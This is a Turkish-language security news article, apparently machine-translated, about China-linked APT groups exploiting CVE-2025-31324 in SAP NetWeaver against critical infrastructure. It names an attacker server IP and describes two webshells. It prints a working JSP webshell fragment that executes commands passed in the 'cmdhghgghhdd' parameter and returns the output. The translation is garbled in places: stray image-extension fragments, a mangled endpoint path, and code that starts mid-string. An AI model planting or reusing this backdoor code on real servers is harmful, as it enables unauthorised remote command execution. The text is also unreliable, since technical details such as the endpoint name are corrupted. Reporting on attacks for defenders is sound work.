Nisan 2025’te güvenlik araştırmacıları, SAP NetWeaver görsel bestecisinde daha önce bilinmeyen bir güvenlik açığı ile dünya çapında kritik altyapı ağlarını hedefleyen sofistike bir kampanya belirlediler.
CVE-2025-31324 olarak izlenen güvenlik açığı, kimlik doğrulanmamış saldırganların kötü amaçlı dosyalar yüklemesine ve kullanıcı kimlik doğrulaması veya özel erişim ayrıcalıkları gerektirmeden etkilenen sistemlerde uzaktan kod yürütme özellikleri kazanmasına izin verir.
Saldırılar öncelikle İngiltere’nin doğal gaz dağıtım ağları, su yönetimi kamu hizmetleri, Amerika Birleşik Devletleri tıbbi cihaz üretim tesisleri, yukarı akış petrol ve gaz şirketleri ve Suudi Arabistan hükümet bakanlıklarındaki kuruluşları etkiledi.
.png
)
Güvenlik raporlarına göre, tehlikeye atılan SAP sistemleri endüstriyel kontrol sistemi (ICS) ağlarına bağlandı ve bu müdahalelerin potansiyel etkisini önemli ölçüde artırdı.
Maruz kalan saldırgan altyapısından toplanan istihbarat, UNC5221, UNC5174 ve CL-STA-0048 dahil olmak üzere birden fazla Çin-NEXUS İleri Dikkatli Kalıcı Tehdit (APT) gruplarına bağlantılar ortaya koydu.
.webp)
Bu tehdit aktörlerinin, dünya çapında kritik altyapıyı tehlikeye atmak için stratejik hedeflerle faaliyet gösteren Çin Devlet Güvenliği Bakanlığı (MSS) veya bağlı özel kuruluşlarla bağlantıları olduğuna inanılmaktadır.
Eclecticiq analistleri, saldırgan kontrollü bir sunucuda (15.204.56.106) açık bir şekilde erişilebilir bir dizin belirledi;
Analizlerine göre, sunucu, Web Shells ile tehlikeye atılan ve geri yüklenen 581’den fazla SAP NetWeaver örneğini belgeleyen iki sonuç dosyasını barındırdı ve potansiyel hedefler olarak işaretlenmiş SAP NetWeaver’ı çalıştıran 1.800 alan listesi.
Saldırı vektörü, SAP NetWeaver’daki kötü niyetli web kabukları yüklemek için SAP NetWeaver’daki “/geliştirme şirketi/MetaTatauploader” API uç noktasını kullandı ve saldırganlara kalıcı uzaktan erişim sağladı.
Eclecticiq araştırmacıları, kurban sistemlerine yerleştirilen iki temel web kabuğu keşfettiler: coreasp.jsp ve forwardsap.jsp.
Web Shell yüklerinin anatomisi
İki webshell’in daha sofistike olan Coreasp.jsp, algılamadan kaçınmak için gelişmiş gizleme ve şifreleme teknikleri kullandı.
.webp)
Şifreleme mekanizmasını ortaya koyan webshell:-
");
Process p = Runtime.getRuntime().exec(request.getParameter("cmdhghgghhdd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
} out.println("");
out.println("");
}
%>Bu hafif arka kapı, sistem komutlarını “cmdhghgghhdd” adlı bir parametre aracılığıyla kabul eder ve daha sofistike şifrelenmiş kanal başarısız olursa, çıkışı doğrudan tarayıcıya döndürür.
Eclecticiq araştırmacıları, kampanyayı Çin-nexus operatörlerine bağlayan ek kanıtlar sağlayan Çince konuşan tehdit aktörleri tarafından yaygın olarak kullanılan bir araç seti olan Web Shells’in/冰蝎 V3’e yakından benzediğini kaydetti.
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers